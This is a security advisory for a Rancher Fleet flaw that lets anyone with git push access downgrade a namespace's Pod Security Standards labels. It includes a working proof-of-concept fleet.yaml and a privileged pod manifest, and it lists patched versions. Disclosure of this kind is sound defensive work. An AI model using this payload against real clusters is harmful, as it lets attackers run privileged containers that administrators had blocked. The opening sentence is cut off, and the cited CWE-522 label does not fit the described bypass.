CVE-2026-44938: Rancher Fleet Pod Security Standards Bypass via namespaceLabels
Anyone with git push access to a Fleet-monitored repository could silently downgrade the Pod Security Standards level on a Kubernetes namespace, letting them deploy privileged or otherwise restricted
The problem
Fleet's agent-side deployer applied every label from `namespaceLabels` in `fleet.yaml` (or `BundleDeployment.spec.options.namespaceLabels`) directly to the target namespace on every reconcile loop, with no filtering.
Because Pod Security Standards are enforced entirely through namespace labels prefixed `pod-security.kubernetes.io/`, an attacker who controls a git push could set those labels to `privileged`, silently overwriting whatever a cluster administrator had configured.
The change takes effect on the next Fleet sync without any cluster-level RBAC required beyond repository write access.
Proof of concept
A working proof-of-concept for CVE-2026-44938 in github.com/rancher/fleet, with the exact payload below.
# fleet.yaml committed to attacker-controlled (or compromised) git repository
namespaceLabels:
pod-security.kubernetes.io/enforce: privileged
pod-security.kubernetes.io/enforce-version: latest
pod-security.kubernetes.io/audit: privileged
pod-security.kubernetes.io/warn: privileged
# After Fleet syncs, deploy a privileged workload that PSS would have blocked:
---
apiVersion: v1
kind: Pod
metadata:
name: pwned
namespace: target-namespace
spec:
containers:
- name: shell
image: alpine
securityContext:
privileged: trueThe root cause (CWE-522, Insufficiently Protected Credentials / admission control bypass) is that `addLabelsFromOptions` iterated the caller-supplied label map and applied it verbatim with no denylist or prefix filter.
Kubernetes PSS enforcement is label-driven: the API server reads `pod-security.kubernetes.io/enforce` on the namespace at admission time. Overwriting that label to `privileged` is sufficient to remove all restrictions, no cluster-admin rights needed.
The patch adds a prefix filter that silently drops any key beginning with `pod-security.kubernetes.io/` before the label map is applied to the namespace, preserving whatever the cluster administrator set.
The fix
Upgrade Fleet to v0.15.2 (or v0.14.6, v0.13.11, v0.12.15 for older release trains). The patched deployer filters out all `namespaceLabels` keys starting with the `pod-security.kubernetes.io/` prefix before applying them to the namespace, so git-controlled bundles can no longer downgrade PSS enforcement.
If upgrading immediately is not possible, deploy NeuVector in Protect mode with a Deny rule for privileged containers as a compensating control.
Reported by Radisauskas Arnoldas (NATO / NATO Cyber Security Centre).
Related research
- high · 7.5CVE-2026-44937CVE-2026-44937: Rancher Fleet Unauthenticated Webhook Regex Injection via Unsanitized Repository URL
- critical · 9.9CVE-2026-44935CVE-2026-44935: Rancher Fleet Cross-Namespace Secret Disclosure via Unvalidated valuesFrom
- high · 7.1CVE-2026-50163CVE-2026-50163: oras-go Hardlink Path Traversal via CWD Resolution
- high · 8.1CVE-2026-50138CVE-2026-50138: goshs WebDAV Mode-Flag Access Control Bypass